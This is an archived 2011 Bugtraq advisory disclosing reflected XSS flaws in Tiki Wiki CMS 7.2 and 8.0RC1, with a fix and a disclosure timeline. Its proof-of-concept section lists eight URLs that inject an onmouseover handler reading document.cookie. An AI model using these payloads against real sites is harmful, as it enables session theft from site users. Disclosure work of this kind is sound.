[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Tiki Wiki CMS Groupware Multiple XSS vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
From: security@xxxxxxxxxxxx
Date: Thu, 17 Nov 2011 13:28:52 GMT

Advisory:            Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory ID:         INFOSERVE-ADV2011-01
Author:              Stefan Schurtz
Contact:             security@xxxxxxxxxxxx
Affected Software:   Successfully tested on Tiki 7.2 & 8.0 RC1
Vendor URL:          http://info.tiki.org/
Vendor Status:       fixed for Tiki 7 (New Tiki 6 LTS release in progress)
CVE-ID:              CVE-2011-4454, CVE-2011-4455

==========================
Vulnerability Description
==========================

All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple 
XSS vulnerabilities

==================
PoC-Exploit
==================

8.0RC1

http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"

7.2

http://<target>/tiki-7.2/tiki-admin_system.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-removepage.php/" 
onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-rename_page.php/" 
onmouseover="alert(document.cookie)"

=========
Solution
=========

Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)

====================
Disclosure Timeline
====================

02-Nov-2011 - informed Security Team (security@xxxxxxxxxxxx)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)

========
Credits
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References
===========

http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://secunia.com/advisories/46740

Prev by Date: Secunia Research: DVR Remote ActiveX Control DVRobot Library Loading Vulnerability
Next by Date: [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
Previous by thread: Secunia Research: DVR Remote ActiveX Control DVRobot Library Loading Vulnerability
Next by thread: [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
Index(es):
- Date
- Thread